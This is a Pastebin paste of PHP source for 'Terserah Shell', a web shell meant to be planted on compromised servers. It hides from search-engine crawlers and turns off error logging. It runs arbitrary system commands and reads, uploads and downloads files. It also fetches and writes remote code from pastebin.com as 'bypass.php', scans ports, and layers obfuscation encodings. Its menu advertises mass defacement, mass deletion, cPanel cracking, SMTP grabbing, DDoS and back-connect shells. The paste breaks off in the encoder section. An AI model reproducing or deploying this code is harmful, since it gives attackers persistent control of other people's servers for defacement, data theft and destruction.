SHARE
TWEET

Terserah Shell

choirurrizal Apr 3rd, 2017 454 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. $auth_pass = "d10d6b075de8234f2d33d8246aba5800";
  3. session_start();
  4. error_reporting(0);
  5. set_time_limit(0);
  6. @set_magic_quotes_runtime(0);
  7. @clearstatcache();
  8. @ini_set('error_log',NULL);
  9. @ini_set('log_errors',0);
  10. @ini_set('max_execution_time',0);
  11. @ini_set('output_buffering',0);
  12. @ini_set('display_errors', 0);
  13.  
  14.  
  15. $color = "#00ff00";
  16. $default_action = 'FilesMan';
  17. $default_use_ajax = true;
  18. $default_charset = 'UTF-8';
  19. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  20.     $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  21.     if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  22.         header('HTTP/1.0 404 Not Found');
  23.         exit;
  24.     }
  25. }
  26.  
  27. function login_shell() {
  28. ?>
  29. <html>
  30. <head>
  31. <title>N45HT</title>
  32. <link href='http://i.imgur.com/7d5rIQm.png' rel='icon' type='image/x-icon'/>
  33. <style type="text/css">
  34. html {
  35.      background:#191919;
  36.   -webkit-background-size: cover;
  37.   -moz-background-size: cover;
  38.   -o-background-size: cover;
  39.   background-size: cover;
  40. }
  41. html,body{margin:0;padding:0;height:100%;font:10px Arial;}
  42. #wrapper{min-height:100%;position:relative;}
  43. #header{background:#f0f0f0;padding:5px;height:50px;color:#3000ff;}
  44. #body{padding-bottom:40px;padding-left:10px;}
  45. #footer{background:#f0f0f0;position:absolute;bottom:0;width:100%;
  46.    text-align:center;color:#408080;}
  47. header {
  48.     color: ;
  49.     margin: 10px auto;
  50. }
  51.  
  52. </style>
  53. </head>
  54.  
  55. <center>
  56. <font face="monospace" size='3' color='lavender'><br>
  57.  
  58.  
  59. <header>
  60. <pre>
  61.     </pre>
  62. </header>
  63. <br><br><br><br><br><br><br><br>
  64. <fieldset>
  65.             <label for="login">Username</label>
  66.         <form method="post">
  67. <input type="text" name="id" value="N45HT">
  68. </form>
  69. Password
  70. <form method="post">
  71. <input type="password" name="pass"> <br><br>
  72. <input type="submit" value="Login">
  73. </fieldset>
  74. </form>
  75. <style>
  76. </style>
  77. </head>
  78. <body>
  79.  
  80. </font>
  81. </body>
  82. </head>
  83. <table border="0" cellspacing="1" cellpadding="4" class="tborder"><tr><td class="thead"><strong></strong></td></tr><tr><td class="trow1"></a></td></tr></table><br />
  84. <table border="0" cellspacing="1" cellpadding="4" class="tborder">
  85. <tbody><tr>
  86. <?php
  87. exit;
  88. }
  89. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  90.     if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
  91.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  92.     else
  93.         login_shell();
  94. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  95.     @ob_clean();
  96.     $file = $_GET['file'];
  97.     header('Content-Description: File Transfer');
  98.     header('Content-Type: application/octet-stream');
  99.     header('Content-Disposition: attachment; filename="'.basename($file).'"');
  100.     header('Expires: 0');
  101.     header('Cache-Control: must-revalidate');
  102.     header('Pragma: public');
  103.     header('Content-Length: ' . filesize($file));
  104.     readfile($file);
  105.     exit;
  106. }
  107. ?>
  108. <html>
  109. <head>
  110. <title>Terserah Shell</title>
  111. <meta name='author' content='Shell From N45HT'>
  112. <meta charset="UTF-8">
  113. <link href='http://i.imgur.com/7d5rIQm.png' rel='icon' type='image/x-icon'/>
  114. <style type='text/css'>
  115. @import url(http://fonts.googleapis.com/css?family=Share+Tech+Mono);
  116. html {
  117.     background: #000000;
  118.     color: #ffffff;
  119.     font-family: 'Share Tech Mono';
  120.     font-size: 12px;
  121.     width: 100%;
  122. }
  123. li {
  124.     display: inline;
  125.     margin: 1px;
  126.     padding: 1px;
  127. }
  128.  
  129.  #menu{
  130.     background:#111111;
  131.     margin:9px 3px 4px 2px;
  132. }
  133. #menu a{
  134.     padding:4px 19px;
  135.     margin:0;
  136.     background:#222222;
  137.     text-decoration:none;
  138.     letter-spacing:2px;
  139.     -moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
  140.  
  141. }
  142. #menu a:hover{
  143.     background:#191919;
  144.     border-bottom:1px solid #333333;
  145.     border-top:1px solid #333333;
  146. }
  147. .explore tr:hover{background:#181818}
  148. table tr:first-child{  
  149.     background: #191919;
  150.     text-align: center;
  151.     color: white;
  152. }
  153. table, th, td {
  154.     border-collapse:collapse;
  155.     font-family: Tahoma, Geneva, sans-serif;
  156.     background: transparent;
  157.     font-family: 'Share Tech Mono';
  158.     font-size: 13px;
  159. }
  160. .table_home, .th_home, .td_home {
  161.     border: 1px solid #191919;
  162. }
  163. th {
  164.     padding: 10px;
  165. }
  166. a {
  167.     color: #ffffff;
  168.     text-decoration: none;
  169. }
  170. a:hover {
  171.     color: blue;
  172.     text-decoration: underline;
  173. }
  174. b {
  175.     color: blue;
  176. }
  177. input[type=text], input[type=password],input[type=submit] {
  178.     background: transparent;
  179.     color: #ffffff;
  180.     border: 1px solid #ffffff;
  181.     margin: 5px auto;
  182.     padding-left: 5px;
  183.     font-family: 'Share Tech Mono';
  184.     font-size: 13px;
  185. }
  186. input[type=submit] {
  187.     background: #191919;
  188.     color: #ffffff;
  189.     border: 1px solid #ffffff;
  190.     margin: 5px auto;
  191.     padding-left: 5px;
  192.     font-family: 'Share Tech Mono';
  193.     font-size: 13px;
  194.     cursor:pointer;
  195. }
  196. textarea {
  197.     border: 1px solid #ffffff;
  198.     width: 100%;
  199.     height: 400px;
  200.     padding-left: 5px;
  201.     margin: 10px auto;
  202.     resize: none;
  203.     background: transparent;
  204.     color: #ffffff;
  205.     font-family: 'Share Tech Mono';
  206.     font-size: 13px;
  207. }
  208. select {
  209.     width: 152px;
  210.     background: #000000;
  211.     color: blue;
  212.     border: 1px solid #ffffff;
  213.     margin: 5px auto;
  214.     padding-left: 5px;
  215.     font-family: 'Share Tech Mono';
  216.     font-size: 13px;
  217. }
  218. option:hover {
  219.     background: blue;
  220.     color: #000000;
  221. }
  222. .mybox{-moz-border-radius: 10px; border-radius: 10px;border:1px solid #ff0000; padding:4px 2px;width:70%;line-height:24px;background:none;box-shadow: 0px 4px 2px white;-webkit-box-shadow: 0px 4px 2px #ff0000;-moz-box-shadow: 0px 4px 2px #ff0000;}
  223. .cgx2 {text-align: center;letter-spacing:1px;font-family: "orbitron";color: #ff0000;font-size:25px;text-shadow: 5px 5px 5px black;}
  224. .infoweb {
  225.     border-right: 1px solid #00FFFF;
  226. }
  227. </style>
  228. </head>
  229. <?php
  230.  
  231. function w($dir,$perm) {
  232.     if(!is_writable($dir)) {
  233.         return "<font color=red>".$perm."</font>";
  234.     } else {
  235.         return "<font color=blue>".$perm."</font>";
  236.     }
  237. }
  238. function r($dir,$perm) {
  239.     if(!is_readable($dir)) {
  240.         return "<font color=red>".$perm."</font>";
  241.     } else {
  242.         return "<font color=blue>".$perm."</font>";
  243.     }
  244. }
  245. function exe($cmd) {
  246.     if(function_exists('system')) {        
  247.         @ob_start();      
  248.         @system($cmd);    
  249.         $buff = @ob_get_contents();        
  250.         @ob_end_clean();      
  251.         return $buff;  
  252.     } elseif(function_exists('exec')) {        
  253.         @exec($cmd,$results);      
  254.         $buff = "";        
  255.         foreach($results as $result) {        
  256.             $buff .= $result;      
  257.         } return $buff;    
  258.     } elseif(function_exists('passthru')) {        
  259.         @ob_start();      
  260.         @passthru($cmd);      
  261.         $buff = @ob_get_contents();        
  262.         @ob_end_clean();      
  263.         return $buff;  
  264.     } elseif(function_exists('shell_exec')) {      
  265.         $buff = @shell_exec($cmd);    
  266.         return $buff;  
  267.     }
  268. }
  269. function perms($file){
  270.     $perms = fileperms($file);
  271.     if (($perms & 0xC000) == 0xC000) {
  272.     // Socket
  273.     $info = 's';
  274.     } elseif (($perms & 0xA000) == 0xA000) {
  275.     // Symbolic Link
  276.     $info = 'l';
  277.     } elseif (($perms & 0x8000) == 0x8000) {
  278.     // Regular
  279.     $info = '-';
  280.     } elseif (($perms & 0x6000) == 0x6000) {
  281.     // Block special
  282.     $info = 'b';
  283.     } elseif (($perms & 0x4000) == 0x4000) {
  284.     // Directory
  285.     $info = 'd';
  286.     } elseif (($perms & 0x2000) == 0x2000) {
  287.     // Character special
  288.     $info = 'c';
  289.     } elseif (($perms & 0x1000) == 0x1000) {
  290.     // FIFO pipe
  291.     $info = 'p';
  292.     } else {
  293.     // Unknown
  294.     $info = 'u';
  295.     }
  296.         // Owner
  297.     $info .= (($perms & 0x0100) ? 'r' : '-');
  298.     $info .= (($perms & 0x0080) ? 'w' : '-');
  299.     $info .= (($perms & 0x0040) ?
  300.     (($perms & 0x0800) ? 's' : 'x' ) :
  301.     (($perms & 0x0800) ? 'S' : '-'));
  302.     // Group
  303.     $info .= (($perms & 0x0020) ? 'r' : '-');
  304.     $info .= (($perms & 0x0010) ? 'w' : '-');
  305.     $info .= (($perms & 0x0008) ?
  306.     (($perms & 0x0400) ? 's' : 'x' ) :
  307.     (($perms & 0x0400) ? 'S' : '-'));
  308.     // World
  309.     $info .= (($perms & 0x0004) ? 'r' : '-');
  310.     $info .= (($perms & 0x0002) ? 'w' : '-');
  311.     $info .= (($perms & 0x0001) ?
  312.     (($perms & 0x0200) ? 't' : 'x' ) :
  313.     (($perms & 0x0200) ? 'T' : '-'));
  314.     return $info;
  315. }
  316. function hdd($s) {
  317.     if($s >= 1073741824)
  318.     return sprintf('%1.2f',$s / 1073741824 ).' GB';
  319.     elseif($s >= 1048576)
  320.     return sprintf('%1.2f',$s / 1048576 ) .' MB';
  321.     elseif($s >= 1024)
  322.     return sprintf('%1.2f',$s / 1024 ) .' KB';
  323.     else
  324.     return $s .' B';
  325. }
  326. function ambilKata($param, $kata1, $kata2){
  327.     if(strpos($param, $kata1) === FALSE) return FALSE;
  328.     if(strpos($param, $kata2) === FALSE) return FALSE;
  329.     $start = strpos($param, $kata1) + strlen($kata1);
  330.     $end = strpos($param, $kata2, $start);
  331.     $return = substr($param, $start, $end - $start);
  332.     return $return;
  333. }
  334. function getsource($url) {
  335.     $curl = curl_init($url);
  336.             curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  337.             curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
  338.             curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  339.             curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
  340.     $content = curl_exec($curl);
  341.             curl_close($curl);
  342.     return $content;
  343. }
  344. function bing($dork) {
  345.     $npage = 1;
  346.     $npages = 30000;
  347.     $allLinks = array();
  348.     $lll = array();
  349.     while($npage <= $npages) {
  350.         $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
  351.         if($x) {
  352.             preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
  353.             foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
  354.             $npage = $npage + 10;
  355.             if (preg_match("(first=" . $npage . "&)siU", $x, $linksuiv) == 0) break;
  356.         } else break;
  357.     }
  358.     $URLs = array();
  359.     foreach($allLinks as $url){
  360.         $exp = explode("/", $url);
  361.         $URLs[] = $exp[2];
  362.     }
  363.     $array = array_filter($URLs);
  364.     $array = array_unique($array);
  365.     $sss = count(array_unique($array));
  366.     foreach($array as $domain) {
  367.         echo $domain."\n";
  368.     }
  369. }
  370. function reverse($url) {
  371.     $ch = curl_init("http://domains.yougetsignal.com/domains.php");
  372.           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  373.           curl_setopt($ch, CURLOPT_POSTFIELDS,  "remoteAddress=$url&ket=");
  374.           curl_setopt($ch, CURLOPT_HEADER, 0);
  375.           curl_setopt($ch, CURLOPT_POST, 1);
  376.     $resp = curl_exec($ch);
  377.     $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",",  str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  378.     $array = explode(",,", $resp);
  379.     unset($array[0]);
  380.     foreach($array as $lnk) {
  381.         $lnk = "http://$lnk";
  382.         $lnk = str_replace(",", "", $lnk);
  383.         echo $lnk."\n";
  384.         ob_flush();
  385.         flush();
  386.     }
  387.         curl_close($ch);
  388. }
  389. if(get_magic_quotes_gpc()) {
  390.     function idx_ss($array) {
  391.         return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  392.     }
  393.     $_POST = idx_ss($_POST);
  394.     $_COOKIE = idx_ss($_COOKIE);
  395. }
  396.  
  397. if(isset($_GET['dir'])) {
  398.     $dir = $_GET['dir'];
  399.     chdir($dir);
  400. } else {
  401.     $dir = getcwd();
  402. }
  403. $kernel = php_uname();
  404. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  405. $dir = str_replace("\\","/",$dir);
  406. $scdir = explode("/", $dir);
  407. $freespace = hdd(disk_free_space("/"));
  408. $total = hdd(disk_total_space("/"));
  409. $used = $total - $freespace;
  410. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=red>OFF</font>";
  411. $ds = @ini_get("disable_functions");
  412. $mysql = (function_exists('mysql_connect')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
  413. $curl = (function_exists('curl_version')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
  414. $wget = (exe('wget --help')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
  415. $perl = (exe('perl --help')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
  416. $python = (exe('python --help')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
  417. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=blue>NONE</font>";
  418. if(!function_exists('posix_getegid')) {
  419.     $user = @get_current_user();
  420.     $uid = @getmyuid();
  421.     $gid = @getmygid();
  422.     $group = "?";
  423. } else {
  424.     $uid = @posix_getpwuid(posix_geteuid());
  425.     $gid = @posix_getgrgid(posix_getegid());
  426.     $user = $uid['name'];
  427.     $uid = $uid['uid'];
  428.     $group = $gid['name'];
  429.     $gid = $gid['gid'];
  430. }
  431.  
  432. echo '<center><div id="menu">';
  433. echo "<BR>";
  434. echo "<center><font size='6px' color='lavender'>Terserah Shell >_<</font>";
  435. echo "<br>";
  436. echo "<p>";
  437.  
  438. echo "<li> <a href='?'>Home</a> </li>";
  439. echo "<a style='color: blue;' href='?dir=$dir&do=infosys'>Info Website</a> </li>";
  440. echo "<li> <a href='?dir=$dir&do=upload'>Upload</a> </li>";
  441. echo "<li> <a href='?dir=$dir&do=cmd'>Command</a> </li>";
  442. echo "<li> <a href='?dir=$dir&do=mass_deface'>Mass Deface</a> </li>";
  443. echo "<li> <a href='?dir=$dir&do=mass_delete'>Mass Delete</a> </li>";
  444. echo "<li> <a href='?dir=$dir&do=config'>Config</a> </li>";
  445. echo "<li> <a href='?dir=$dir&do=jumping'>Jumping</a> </li>";
  446. echo "<li> <a href='?dir=$dir&do=cpanel'>CPanel Crack</a> </li>";
  447. echo "<li> <a href='?dir=$dir&do=smtp'>SMTP Grabber</a> </li>";
  448. echo "<br><br><li> <a href='?dir=$dir&do=fake_root'>Fake Root</a> </li>";
  449. echo "<li> <a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> </li>";
  450. echo "<li> <a href='?dir=$dir&do=auto_wp'>Auto Edit Title</a> </li>";
  451. echo "<li> <a href='?dir=$dir&do=zoneh'>Zone-H</a> </li>";
  452. echo "<li> <a href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a> </li>";
  453. echo "<li> <a href='?dir=$dir&do=cpftp_auto'>CFTP Auto Deface</a> </li>";
  454. echo "<li> <a href='?dir=$dir&do=krdp_shell'>KRDP Shell</a> </li>";
  455. echo "<li> <a href='?dir=$dir&do=network'>network</a> </li>";
  456. echo "<li> <a href='?dir=$dir&do=about'>about</a> </li>";
  457. echo "<br><br><li> <a href='?dir=$dir&do=adminer'>Adminer</a> </li>";
  458. echo "<li> <a href='?dir=$dir&do=tool'>Tool</a>";
  459. echo "<li> <a href='?dir=$dir&do=admf'>Admin Finder</a> </li>";
  460. echo "<li> <a href='?dir=$dir&do=symlink'>symlink</a> </li>";
  461. echo "<li> <a href='?dir=$dir&do=autoklik'>Priv Auto Deface From N45HT</a> </li>";
  462. echo "<li> <a href='?dir=$dir&do=whois'>Whois</a> </li>";
  463. echo "<li> <a href='?dir=$dir&do=cgi'>CGI Telnet</a> </li>";
  464. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF Online</a> </li>";
  465. echo "<br><br><li> <a href='?dir=$dir&do=ddos'>DDos</a> </li>";
  466. echo "<li> <a href='?dir=$dir&do=shellscanner'>Shell Scanner</a> </li>";
  467. echo "<li> <a href='?dir=$dir&do=endeco'>Encode Decode</a> </li>";
  468. echo "<li> <a href='?xp=bypassserver'>Full bypass</a> </li>";
  469. echo "<li> <a href='?dir=$dir&do=defacerid'>DefacerID</a> </li>";
  470. echo "<li> <a href='?dir=$dir&do=bconnet'>Back Connect</a> </li>";
  471. echo "<li> <a style='color: red;' href='?logout=true'>Logout</a> </li>";
  472. echo "<br>";
  473. echo "<br>";
  474. echo "<BR>";
  475. echo "<hr>";
  476. echo "<p>";
  477. echo "Current DIR: ";
  478. foreach($scdir as $c_dir => $cdir) {  
  479.     echo "<a href='?dir=";
  480.     for($i = 0; $i <= $c_dir; $i++) {
  481.         echo $scdir[$i];
  482.         if($i != $c_dir) {
  483.         echo "/";
  484.         }
  485.     }
  486.     echo "'>$cdir</a>/";
  487. }
  488. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]";
  489. echo "<hr>";
  490.  
  491. echo "</ul>";
  492. echo "</div>";
  493. if($_GET['logout'] == true) {
  494.     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  495.     echo "<script>window.location='?';</script>";
  496. } elseif($_GET['do'] == 'upload') {
  497.     echo "<center>";
  498.     if($_POST['upload']) {
  499.         if($_POST['tipe_upload'] == 'biasa') {
  500.             if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  501.                 $act = "<font color=blue>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  502.             } else {
  503.                 $act = "<font color=red>failed to upload file</font>";
  504.             }
  505.         } else {
  506.             $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  507.             $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  508.             if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  509.                 if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  510.                     $act = "<font color=blue>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  511.                 } else {
  512.                     $act = "<font color=red>failed to upload file</font>";
  513.                 }
  514.             } else {
  515.                 $act = "<font color=red>failed to upload file</font>";
  516.             }
  517.         }
  518.     }
  519.     echo "Upload File:
  520.    <form method='post' enctype='multipart/form-data'>
  521.    <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
  522.    <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
  523.    <input type='file' name='ix_file'>
  524.    <input type='submit' value='upload' name='upload'>
  525.    </form>";
  526.     echo $act;
  527.     echo "</center>";
  528. }
  529. function parah($pastebin, $nama_file){
  530.     $usa = file_get_contents("$pastebin");
  531.     $frr = fopen("$nama_file", 'w');
  532.     fwrite($frr, $usa);
  533. }
  534. $xp = @$_GET['xp'];
  535. if($xp == "bypassserver"){
  536.             $config = parah("http://pastebin.com/raw/ATSD5myG", "bypass.php");
  537.        echo '<center><font color =red><a href="bypass.php" target="_blank">Clik Here To Switch Bypass</a><br></font></center>';
  538. } elseif($_GET['do'] == 'whois') {
  539. @set_time_limit(0);
  540.    @error_reporting(0);
  541.    function sws_domain_info($site)
  542.    {
  543.    $getip = @file_get_contents("http://networktools.nl/whois/$site");
  544.    flush();
  545.    $ip = @findit($getip,'<pre>','</pre>');
  546.    return $ip;
  547.    flush();
  548.    }
  549.    function sws_net_info($site)
  550.    {
  551.    $getip = @file_get_contents("http://networktools.nl/asinfo/$site");
  552.    $ip = @findit($getip,'<pre>','</pre>');
  553.    return $ip;
  554.    flush();
  555.    }
  556.    function sws_site_ser($site)
  557.    {
  558.    $getip = @file_get_contents("http://networktools.nl/reverseip/$site");
  559.    $ip = @findit($getip,'<pre>','</pre>');
  560.    return $ip;
  561.    flush();
  562.    }
  563.    function sws_sup_dom($site)
  564.    {
  565.    $getip = @file_get_contents("http://www.magic-net.info/dns-and-ip-tools.dnslookup?subd=".$site."&Search+subdomains=Find+subdomains");
  566.    $ip = @findit($getip,'<strong>Nameservers found:</strong>','<script type="text/javascript">');
  567.    return $ip;
  568.    flush();
  569.    }
  570.    function sws_port_scan($ip)
  571.    {
  572.    $list_post = array('80','21','22','2082','25','53','110','443','143');
  573.    foreach ($list_post as $o_port)
  574.    {
  575.    $connect = @fsockopen($ip,$o_port,$errno,$errstr,5);
  576.    if($connect)
  577.    {
  578.    echo ' $ip : $o_port ??? <u style="color: blue">Open</u> <br /><br />';
  579.    flush();
  580.    }
  581.    }
  582.    }
  583.    function findit($mytext,$starttag,$endtag) {
  584.    $posLeft = @stripos($mytext,$starttag)+strlen($starttag);
  585.    $posRight = @stripos($mytext,$endtag,$posLeft+1);
  586.    return @substr($mytext,$posLeft,$posRight-$posLeft);
  587.    flush();
  588.    }
  589.    echo '<br><br><center>';
  590.    echo '
  591.    <br />
  592.    <div class="sc"><form method="post"><table>
  593.    <tr><th colspan="5" style="border: 2px blue dotted;">Whois Site</th></tr>
  594.    <tr><td>Site to scan </td><td>:</td><td><input type="text" name="site" size="50" style="color:Lavender;" class="inputz" value="site.com" /> � <input class="inputzbut" type="submit" style="color:Lavender;background-color:#000000" name="scan" value="Scan !" /></td></tr>
  595.    </table></form></div>';
  596.    if(isset($_POST['scan']))
  597.    {
  598.    $site = @htmlentities($_POST['site']);
  599.    if (empty($site)){die('<br /><br /> Not add IP .. !');}
  600.    $ip_port = @gethostbyname($site);
  601.    echo "
  602.   <br /><div class='sc2'>Scanning [ $site ip $ip_port ] ... </div>
  603.   <div class='tit'> <br /><br />|-------------- Port Server ------------------| <br /></div>
  604.   <div class='ru'> <br /><br /><pre>
  605.   ";
  606.    echo "".sws_port_scan($ip_port)." </pre></div> ";
  607.    flush();
  608.    echo '<div class="tit"><br /><br />|-------------- Domain Info ------------------| <br /> </div>
  609.   <div class="ru">
  610.   <pre>".sws_domain_info($site)."</pre></div>';
  611.    flush();
  612.    echo '
  613.   <div class="tit"> <br /><br />|-------------- Network Info ------------------| <br /></div>
  614.   <div class="ru">
  615.   <pre>".sws_net_info($site)."</pre> </div>';
  616.    flush();
  617.    echo '<div class="tit"> <br /><br />|-------------- subdomains Server ------------------| <br /></div>
  618.   <div class="ru">
  619.   <pre>".sws_sup_dom($site)."</pre> </div>';
  620.    flush();
  621.    echo '<div class="tit"> <br /><br />|-------------- Site Server ------------------| <br /></div>
  622.   <div class="ru">
  623.   <pre>".sws_site_ser($site)."</pre> </div>
  624.   <div class="tit"> <br /><br />|-------------- END ------------------| <br /></div>';
  625.    flush();
  626.    }
  627.     echo '</center>';
  628.  
  629. } elseif($_GET['do'] == 'whois') {
  630. ?>
  631. <body >
  632. <center>
  633. <br>
  634. <form method="post"><br>
  635. <textarea class='inputz' cols=30 rows=5 name="mbutt" style="background:transparent;color:blue;"></textarea><br><br>
  636. <select class='inputz' size="1" name="ope" style="background:red;color:blue;">
  637. <option style='background:transparent;color:blue;'><center>[#] Encryption [#]</option>
  638. <option value="urlencode" style='background:transparent;color:blue;'>url</option>
  639. <option value="base64" style='background:transparent;color:blue;'>Base64</option>
  640. <option value="ur" style='background:transparent;color:blue;'>convert_uu</option>
  641. <option value="json" style='background:transparent;color:blue;'>json</option>
  642. <option value="gzinflates" style='background:transparent;color:blue;'>gzinflate - base64</option>
  643. <option value="str2" style='background:transparent;color:blue;'>str_rot13 - base64</option>
  644. <option value="gzinflate" style='background:transparent;color:blue;'>str_rot13 - gzinflate - base64</option>
  645. <option value="gzinflater" style='background:transparent;color:blue;'>gzinflate - str_rot13 - base64</option>
  646. <option value="gzinflatex" style='background:transparent;color:blue;'>gzinflate - str_rot13 - gzinflate - base64</option>
  647. <option value="gzinflatew" style='background:transparent;color:blue;'>str_rot13 - convert_uu - url - gzinflate - str_rot13 - base64 - convert_uu - gzinflate - url - str_rot13 - gzinflate - base64</option>
  648. <option value="str" style='background:transparent;color:blue;'>str_rot13 - gzinflate - str_rot13 - base64</option>
  649. <option value="url" style='background:transparent;color:blue;'>base64 - gzinflate - str_rot13 - convert_uu - gzinflate - base64</option>
  650. <option value="hexencode" style='background:transparent;color:blue;'>Hex Encode/Decode</option>
  651. <option value="md5" style='background:transparent;color:blue;'><center>MD5 Hash</option>
  652. <option value="sha1" style='background:transparent;color:blue;'>SHA1 Hash</option>
  653. <option value="str_rot13" style='background:transparent;color:blue;'>ROT13 Hash</option>
  654. <option value="strlen" style='background:transparent;color:blue;'>strlen</option>
  655. <option value="xxx" style='background:transparent;color:blue;'>unescape</option>
  656. <option value="bbb" style='background:transparent;color:blue;'>charAt</option>
  657. <option value="aaa" style='background:transparent;color:blue;'>chr - bin2hex - substr</option>
  658. <option value="www" style='background:transparent;color:blue;'>chr</option>
  659. <option value="sss" style='background:transparent;color:blue;'>htmlspecialchars</option>
  660. <option value="eee" style='background:transparent;color:blue;'>escape</option></select><br><input class='inputzbut' type='submit' name='submit' value='Encode' style="background:transparent;color:blue;">
  661. <input class='inputzbut' type='submit' name='crack' value='Decode' style="background:transparent;color:blue;"><br>
  662. </select>�
  663. </form>
  664. <?php
  665. $submit = $_POST['submit'];
  666. if (isset($submit)){
  667. $op = $_POST["ope"];
  668. switch ($op) {case 'base64': $codi=base64_encode($text);
  669. break;case 'str' : $codi=(base64_encode(str_rot13(gzdeflate(str_rot13($text)))));
  670. break;case 'json' : $codi=json_encode(utf8_encode($text));
  671. break;case 'gzinflate' : $codi=base64_encode(gzdeflate(str_rot13($text)));
  672. break;case 'gzinflater' : $codi=base64_encode(str_rot13(gzdeflate($text)));
  673. break;case 'gzinflatex' : $codi=base64_encode(gzdeflate(str_rot13(gzdeflate($text))));
  674. break;case 'gzinflatew' : $codi=base64_encode(gzdeflate(str_rot13(rawurlencode(gzdeflate(convert_uuencode(base64_encode(str_rot13(gzdeflate(convert_uuencode(rawurldecode(str_rot13($text))))))))))));
  675. break;case 'gzinflates' : $codi=base64_encode(gzdeflate($text));
  676. break;case 'str2' : $codi=base64_encode(str_rot13($text));
  677. break;case 'urlencode' : $codi=rawurlencode($text);
  678. break;case 'hexencode' : $codi=bin2hex($text);
  679. break;case 'md5' : $codi=md5($text);
  680. break;case 'ur' : $codi=convert_uuencode($text);
  681. break;case 'str_rot13' : $codi=str_rot13($text);
  682. break;case 'sha1' : $codi=sha1($text);
  683. break;case 'strlen' : $codi=strlen($text);
  684. break;case 'xxx' : $codi=strlen(bin2hex($text));
  685. break;case 'bbb' : $codi=htmlentities(utf8_decode($text));
  686. break;case 'aaa' : $codi=chr(bin2hex(substr($text)));
  687. break;case 'www' : $codi=chr($text);
  688. break;case 'sss' : $codi=htmlspecialchars($text);
  689. break;case 'eee' : $codi=addslashes($text);
  690. break;case 'url' : $codi=base64_encode(gzdeflate(convert_uuencode(str_rot13(gzdeflate(base64_encode($text))))));
  691. break;default:break;}}
  692.  
  693. $submit = $_POST['crack'];
  694. if (isset($submit)){
  695. $op = $_POST["ope"];
  696. switch ($op) {case 'base64': $codi=base64_decode($text);
  697. break;case 'str' : $codi=str_rot13(gzinflate(str_rot13(base64_decode(($text)))));
  698. break;case 'json' : $codi=utf8_dencode(json_dencode($text));
  699. break;case 'gzinflate' : $codi=str_rot13(gzinflate(base64_decode($text)));
  700. break;case 'gzinflater' : $codi=gzinflate(str_rot13(base64_decode($text)));
  701. break;case 'gzinflatex' : $codi=gzinflate(str_rot13(gzinflate(base64_decode($text))));
  702. break;case 'gzinflatew' : $codi=str_rot13(rawurldecode(convert_uudecode(gzinflate(str_rot13(base64_decode(convert_uudecode(gzinflate(rawurldecode(str_rot13(gzinflate(base64_decode($text))))))))))));
  703. break;case 'gzinflates' : $codi=gzinflate(base64_decode($text));
  704. break;case 'str2' : $codi=str_rot13(base64_decode($text));
  705. break;case 'urlencode' : $codi=rawurldecode($text);
  706. break;case 'hexencode' : $codi=quoted_printable_decode($text);
  707. break;case 'ur' : $codi=convert_uudecode($text);
  708. break;case 'url' : $codi=base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode(($text)))))));
  709. break;default:break;}}
  710. $html = htmlentities(stripslashes($codi));
  711. echo "<from><center><h3><font size=4 face=chiller color=blue>LugiX SHell Code</h3></center><textarea cols=70 rows=20 style='onfocus();font-weight:bold;color:red;background-image: transparent;opacity:0.40;background-size:100%;background-repeat: no-repeat;' class='inputz' readonly>".$html."</textarea><BR/><BR/></center></from>";
  712. ?>
